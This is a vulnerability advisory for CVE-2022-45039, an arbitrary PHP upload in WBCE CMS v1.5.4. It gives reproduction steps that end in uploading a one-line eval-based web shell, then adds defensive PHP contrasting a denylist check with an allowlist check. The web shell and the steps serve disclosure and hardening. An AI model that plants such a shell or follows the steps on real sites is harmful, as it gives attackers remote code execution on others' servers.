CVE-2022-45039: WBCE CMS v1.5.4 getshell
An arbitrary file upload vulnerability in the Server Settings module of WBCE CMS v1.5.4 allows attackers to execute arbitrary code via a crafted PHP file.
Exploit Title: WBCE CMS v1.5.4 can implement getshell by modifying the upload file type
Date: 24/11/2022
Exploit Author: 10vexh
Contact: https://github.com/10vexh
Product: WBCE CMS (https://github.com/WBCE/WBCE_CMS)
Version: v1.5.4
Description: A PHP file can be uploaded after modifying, in the admin backend, the list of file types prohibited from upload, resulting in getshell.
**Steps to reproduce:**
1. Select show advanced options in Settings.
2. Set "No upload for this filetypes" to null.
3. Select Upload File.
4. Upload a Trojan: `<? php @eval($_POST[‘test’]) ?>`
5. Find that the storage path can be connected to.
6. Try to connect.
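
The steps above work because the only gate on uploads is a denylist that an administrator can empty. The following is an added example, not WBCE's code: the function names, the comma-separated setting format and the allowlist are assumptions. It shows that weak pattern beside a check where the setting can only narrow a fixed allowlist.

```php
<?php
// Added example: hypothetical helpers, not taken from WBCE.

// Weak pattern: the only gate is an admin-editable denylist.
// An emptied setting yields an empty list, so every extension passes.
function upload_allowed_weak(string $filename, string $deniedSetting): bool
{
    $denied = array_filter(array_map('trim', explode(',', strtolower($deniedSetting))));
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return !in_array($ext, $denied, true);
}

// Hardened pattern: a fixed allowlist lives in code (constructed list);
// the admin setting can remove types from it but never add any.
const ALLOWED_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt'];

function upload_allowed_hardened(string $filename, string $deniedSetting): bool
{
    $name = strtolower(basename($filename));
    // Reject empty names, control characters, and trailing dots or spaces.
    if ($name === '' || preg_match('/[\x00-\x1f]/', $name) || preg_match('/[. ]$/', $name)) {
        return false;
    }
    $parts = explode('.', $name);
    // No extension at all, or a dotfile such as .htaccess.
    if (count($parts) < 2 || $parts[0] === '') {
        return false;
    }
    array_shift($parts); // drop the base name, keep every extension segment
    $denied = array_filter(array_map('trim', explode(',', strtolower($deniedSetting))));
    // Strict by design: each segment must be allowed, so "a.php.jpg" fails.
    foreach ($parts as $ext) {
        if (!in_array($ext, ALLOWED_EXTENSIONS, true) || in_array($ext, $denied, true)) {
            return false;
        }
    }
    return true;
}

// Constructed sample names; '' models the emptied setting from the steps above.
foreach (['photo.jpg', 'shell.php', 'shell.php.jpg', '.htaccess', 'report.pdf'] as $f) {
    printf("%-14s weak=%s hardened=%s\n", $f,
        var_export(upload_allowed_weak($f, ''), true),
        var_export(upload_allowed_hardened($f, ''), true));
}
```

An extension check is only one layer; the upload directory should also be configured so the web server never executes scripts from it.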